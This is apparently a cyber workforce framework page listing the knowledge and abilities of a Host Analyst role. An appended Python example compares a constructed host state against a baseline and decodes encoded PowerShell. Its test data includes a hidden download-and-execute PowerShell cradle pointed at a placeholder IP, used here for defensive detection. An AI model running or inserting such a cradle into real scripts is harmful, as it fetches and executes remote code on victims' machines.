Host Analyst
A Host Analyst (HA) has knowledge of the various system configurations encountered in an environment, of system services and their security and configuration, and of file systems, permissions, and operating system configurations. The Host Analyst conducts analysis using the tools and capabilities built into the host operating system.
Core KSATs
KSAT ID | Description | Type
---|---|---
22 | Knowledge of computer networking concepts and protocols, and network security methodologies. | Knowledge
108 | Knowledge of risk management processes (e.g., methods for assessing and mitigating risk). | Knowledge
1157 | Knowledge of national and international laws, regulations, policies, and ethics as they relate to cybersecurity. | Knowledge
1158 | Knowledge of cybersecurity principles. | Knowledge
1159 | Knowledge of cyber threats and vulnerabilities. | Knowledge
6900 | Knowledge of specific operational impacts of cybersecurity lapses. | Knowledge
6935 | Knowledge of cloud computing service models: Software as a Service (SaaS), Infrastructure as a Service (IaaS), and Platform as a Service (PaaS). | Knowledge
6938 | Knowledge of cloud computing deployment models in private, public, and hybrid environments, and the difference between on-premises and off-premises environments. | Knowledge
Additional KSATs
KSAT ID | Description | Type
---|---|---
4171 | Ability to analyze a finding of a compromise and develop custom signature(s) and/or rule(s) to identify it throughout the network. | Ability
4172 | Ability to analyze adversarial avenues of approach on a mission-critical system. | Ability
4174 | Ability to analyze Data at Rest and Data in Transit encryption methodologies and assess Data at Rest and Data in Transit policies in support of identifying outliers to delineate possible avenues of approach. | Ability
4176 | Ability to analyze how the tools operate to enumerate the system. | Ability
4179 | Ability to analyze multiple memory captures, determine anomalous behavior, and develop a detailed report that includes a timeline of compromise. | Ability
4182 | Ability to analyze organizational policies and documentation for appropriate use and user privileges to determine current user access rights policies. | Ability
4184 | Ability to analyze potentially malicious processes, libraries, and modules on a system. | Ability
4185 | Ability to analyze process lists within Windows, Unix, or Linux operating systems. | Ability
4186 | Ability to analyze software installed and in use on a system or host machine and compare it to the authorized software list provided by the network owner. | Ability
4187 | Ability to analyze tools/hardware used to extract/analyze/capture memory and disk images. | Ability
4188 | Ability to analyze user-mode and kernel-mode rootkits, how they function, and how they differ. | Ability
4189 | Ability to analyze vulnerabilities and misconfigurations without Information Assurance artifacts. | Ability
4195 | Ability to build a baseline of configuration/state for host machines. | Ability
4197 | Ability to capture a memory image from a host workstation. | Ability
4198 | Ability to capture forensically sound memory and disk images with regard to timeline analysis. | Ability
4206 | Ability to gather active user accounts on a network and compare them to the authorized user list and the appropriate Standard Operating Procedure (SOP). | Ability
4207 | Ability to compare current state against baselines. | Ability
4209 | Ability to compile group policies and access control lists from mission partner networks. | Ability
4210 | Ability to compile host-based firewall and host intrusion prevention system configurations through group policy modifications. | Ability
4211 | Ability to conduct disk forensics on multiple images. | Ability
4216 | Ability to configure log aggregation. | Ability
4217 | Ability to configure, forward, and statistically analyze logs. | Ability
4225 | Ability to correlate indicators of compromise. | Ability
4232 | Ability to de-obfuscate (e.g., command line execution, string substitution, clandestine side channel, Base64). | Ability
4234 | Ability to develop a risk defense plan (e.g., behavioral development, etc.) and put active measures in place in defense of a network, endpoint, and/or host. | Ability
4237 | Ability to develop dashboards to better visualize data. | Ability
4238 | Ability to develop host-based IDS/IPS signatures and settings. | Ability
4239 | Ability to develop the reporting and recording of discovered potentially malicious processes, libraries, and modules on a compromised system. | Ability
4245 | Ability to enumerate domain security groups. | Ability
4246 | Ability to enumerate knowledge management applications (e.g., SharePoint) and their service accounts/security groups. | Ability
4247 | Ability to enumerate network shares, identify ACLs/security permissions, and analyze them for vulnerabilities/misconfigurations (e.g., SMB, NFS, iSCSI). | Ability
4250 | Ability to evaluate common Tactics, Techniques, and Procedures (TTPs) used in malware, and the open-source and Intelligence Community (IC) resources available to identify emerging TTPs. | Ability
4251 | Ability to evaluate compliance with Security Technical Implementation Guides (STIGs) on host machines by utilizing a compliance scanner, in support of identifying outliers in order to delineate possible avenues of approach. | Ability
4252 | Ability to evaluate whether patches are up to date for all hosts, determine the current process for applying patches, and determine the current patch level for all hosts on a network according to NIST Special Publication 800-40, in support of identifying outliers in order to delineate possible avenues of approach. | Ability
4256 | Ability to evaluate rogue/unauthorized systems on a network. | Ability
4257 | Ability to evaluate security posture shortcomings in group policy. | Ability
4258 | Ability to evaluate steps taken after host-based IDS/IPS alerts, verify the finding, and ensure its volatility. | Ability
4259 | Ability to evaluate system resiliency in adverse conditions. | Ability
4262 | Ability to export/enumerate information (e.g., users, groups) from a Domain Controller. | Ability
4266 | Ability to identify activity context in log entries to correlate indicators of compromise. | Ability
4269 | Ability to identify anomalous network traffic on a host machine. | Ability
4273 | Ability to identify critical infrastructure systems with information communication technology that were designed without system security considerations. | Ability
4281 | Ability to identify new indicators of compromise through anomalous behavior in log entries. | Ability
4283 | Ability to identify security posture shortcomings. | Ability
4284 | Ability to identify tools and techniques available for analyzing binary applications and interpreted scripts. | Ability
4287 | Ability to identify/select the most appropriate tools and solutions for the specific environment (e.g., disk/memory forensics/capture, host enumeration, application whitelisting, log aggregation and analysis, HIPS/HIDS solutions, etc.). | Ability
4288 | Ability to implement and configure host-based firewalls and host intrusion prevention systems. | Ability
4289 | Ability to implement Data at Rest and Data in Transit encryption methodologies and assess Data at Rest and Data in Transit policies. | Ability
4302 | Ability to measure known vulnerabilities against known vectors of approach. | Ability
4306 | Ability to monitor Active Directory (AD) for creation of unauthorized/potentially malicious accounts. | Ability
4309 | Ability to operate specified tools to enumerate a system. | Ability
4312 | Ability to organize the Active Directory (AD) hierarchy structure. | Ability
4313 | Ability to organize logging and auditing procedures, including server-based logging. | Ability
4315 | Ability to organize the order of volatility when capturing artifacts. | Ability
4318 | Ability to perform and analyze situational awareness commands within Windows, Unix, and Linux operating systems (e.g., systeminfo, netstat, ipconfig, tasklist, ls, ifconfig, etc.). | Ability
4319 | Ability to perform and analyze vulnerability scans on host machines in support of identifying outliers in order to delineate possible avenues of approach. | Ability
4320 | Ability to perform complex root-cause analysis of an intrusion and recommend mitigations. | Ability
4323 | Ability to perform dynamic analysis. | Ability
4326 | Ability to perform static analysis. | Ability
4331 | Ability to prioritize how Operating System (OS) and application patches are distributed to different systems. | Ability
4332 | Ability to prioritize Operating System (OS) default processes, libraries, and modules based on boot order, dependencies, or key operations. | Ability
4337 | Ability to provide host analysis for a Risk Mitigation Plan (RMP) to improve the customer's overall security posture. | Ability
4339 | Ability to provide mitigations to recover from a full network compromise. | Ability
4351 | Ability to select the best tools to enumerate a given set of host machines in order to validate whether they match known baselines. | Ability
4363 | Ability to use and integrate a Security Information and Event Management (SIEM) platform. | Ability
4371 | Ability to use host volatile data to compare active processes, libraries, and modules against databases of known good/bad. | Ability
4375 | Ability to utilize Defense Information Systems Agency (DISA)/Department of Defense (DoD) system configuration guidelines. | Ability
4390 | Knowledge of Active Directory Federation Services. | Knowledge
4413 | Knowledge of common information network malware (e.g., viruses, trojans, etc.) and vectors of attack (e.g., ports, attachments, etc.). | Knowledge
4415 | Knowledge of common obfuscation techniques (e.g., command line execution, string substitution, clandestine side channel, Base64). | Knowledge
4416 | Knowledge of common persistence locations within Windows, Unix, or Linux operating systems. | Knowledge
4427 | Knowledge of cybersecurity and cybersecurity-enabled software products. | Knowledge
4429 | Knowledge of cybersecurity controls and design principles and methods (e.g., firewalls, DMZ, and encryption). | Knowledge
4430 | Knowledge of the cybersecurity Risk Management Framework (RMF) process. | Knowledge
4434 | Knowledge of DCO capabilities, including open-source tools, and their capabilities. | Knowledge
4435 | Knowledge of Defense-in-Depth principles. | Knowledge
4438 | Knowledge of different types of log subscriptions (e.g., push vs. pull, MS Windows Event Forwarding, winlogbeat, syslog). | Knowledge
4443 | Knowledge of evasion strategies and TTPs (e.g., noise, stealth, situational awareness, bandwidth throttling). | Knowledge
4445 | Knowledge of existing cybersecurity principles, policies, and procedures. | Knowledge
4452 | Knowledge of the full spectrum of cyberspace operations in an intelligence-driven DCO environment. | Knowledge
4501 | Knowledge of non-Active Directory domains (e.g., IDM, LDAP). | Knowledge
4522 | Knowledge of public key infrastructure (PKI) libraries, certificate authorities, certificate management, and encryption functionalities. | Knowledge
4537 | Knowledge of stream providers (e.g., Kafka). | Knowledge
4539 | Knowledge of structured response frameworks (e.g., MITRE ATT&CK, Lockheed Martin Kill Chain, Diamond Model). | Knowledge
4583 | Knowledge of the U.S. Security System authorities, responsibilities, and contributions to the cyberspace operations mission. | Knowledge
4585 | Knowledge of the Windows registry hive keys and the information contained within each one. | Knowledge
4589 | Knowledge of typical system processes within Windows, Unix, or Linux operating systems. | Knowledge
4595 | Knowledge of web applications and their common attack vectors. | Knowledge
4599 | Skill in analyzing endpoint collection data. | Skill
4655 | Skill in providing support to intelligence analysts to understand the operational environment and how it ties to intelligence reporting. | Skill
4660 | Skill in refining research (e.g., vulnerabilities, TTPs) to assist intelligence analysts' preparation of products. | Skill
4665 | Skill in run-level configuration in a Linux or UNIX environment. | Skill
4679 | Skill in using various online tools for open-source research (e.g., online trade, DNS, mail, etc.). | Skill
8036 | Conduct open-source research via various online tools. | Task
8041 | Confer with systems analysts, engineers, programmers, and others to design applications and to obtain information on project limitations and capabilities, performance requirements, and interfaces. | Task
8111 | Identify potential points of strength and vulnerability among segments of a network map. | Task
8115 | Identify tools/hardware used to extract/analyze/capture memory and disk images. | Task
8151 | Perform security reviews and identify gaps in security architecture that can be used in the development of a security risk management plan. | Task
8161 | Provide and maintain documentation for TTPs as inputs to training programs. | Task
8212 | Validate intrusion detection system (IDS) alerts. | Task
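Several of the abilities above describe one workflow: build a baseline of host state (4195), compare the current state against it (4207), compare active accounts against the authorized list (4206), check running images against a known-good database (4371), and de-obfuscate Base64-encoded command lines (4232). The following Python script is an added example of that comparison; it is not part of the DCWF page or any DoD tool. The baseline layout, the field names (`users`, `processes`, `image`, `sha256`, `cmdline`) and all host data are constructed for the example, so it runs offline without enumerating a live host.

```python
"""Compare a host's current state against a known-good baseline.

Added example for the Host Analyst abilities listed above. All host data
is constructed inline; on a real host the CURRENT structure would be
filled from tasklist/net user (Windows) or ps/getent passwd (Linux).
"""
import base64
import hashlib
import re


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed image contents so the baseline carries real sha256 values.
GOOD_SVCHOST = sha256_hex(b"svchost.exe known-good build")
GOOD_LSASS = sha256_hex(b"lsass.exe known-good build")
GOOD_PS = sha256_hex(b"powershell.exe known-good build")

# Baseline captured while the host was trusted (4195): the authorized
# account list (4206) and image path -> sha256 for expected processes (4371).
BASELINE = {
    "users": {"Administrator", "svc_backup", "jdoe"},
    "processes": {
        r"C:\Windows\System32\svchost.exe": GOOD_SVCHOST,
        r"C:\Windows\System32\lsass.exe": GOOD_LSASS,
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe": GOOD_PS,
    },
}


def encode_ps(command: str) -> str:
    """PowerShell -EncodedCommand takes Base64 of the UTF-16LE command text."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed current state: one extra local account, one lsass.exe whose
# on-disk hash differs from the baseline, one unknown image in a temp
# directory, and one PowerShell process with an encoded command line.
CURRENT = {
    "users": {"Administrator", "svc_backup", "jdoe", "support$"},
    "processes": [
        {"pid": 812, "image": r"C:\Windows\System32\svchost.exe",
         "sha256": GOOD_SVCHOST, "cmdline": "svchost.exe -k netsvcs"},
        {"pid": 640, "image": r"C:\Windows\System32\lsass.exe",
         "sha256": sha256_hex(b"tampered"), "cmdline": "lsass.exe"},
        {"pid": 4412, "image": r"C:\Users\jdoe\AppData\Local\Temp\upd.exe",
         "sha256": sha256_hex(b"unknown"), "cmdline": "upd.exe"},
        {"pid": 4420,
         "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "sha256": GOOD_PS,
         "cmdline": "powershell.exe -nop -w hidden -enc " + encode_ps(
             "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')")},
    ],
}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc).
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload (4232), or None when the
    command line has no such argument or the argument is not Base64-wrapped
    UTF-16LE text (e.g. truncated by a log that capped the field length)."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def compare(baseline: dict, current: dict) -> list:
    """Return (finding_type, detail) tuples for every deviation from baseline (4207)."""
    findings = []
    for user in sorted(current["users"] - baseline["users"]):
        findings.append(("unauthorized_account", user))
    for proc in current["processes"]:
        expected = baseline["processes"].get(proc["image"])
        if expected is None:
            findings.append(("unknown_image", proc["image"]))
        elif expected != proc["sha256"]:
            findings.append(("hash_mismatch", proc["image"]))
        decoded = decode_encoded_command(proc["cmdline"])
        if decoded is not None:
            findings.append(("encoded_command", decoded))
    return findings


if __name__ == "__main__":
    for kind, detail in compare(BASELINE, CURRENT):
        print(f"{kind:22} {detail}")
```

A hash mismatch on a path that is in the baseline is treated differently from an unknown path: the former means a known binary was replaced or patched, the latter that something new is executing. Missing accounts are deliberately not reported here; an account that disappears is a change-management question, whereas a new one outside the authorized list is the case 4306 asks the analyst to catch.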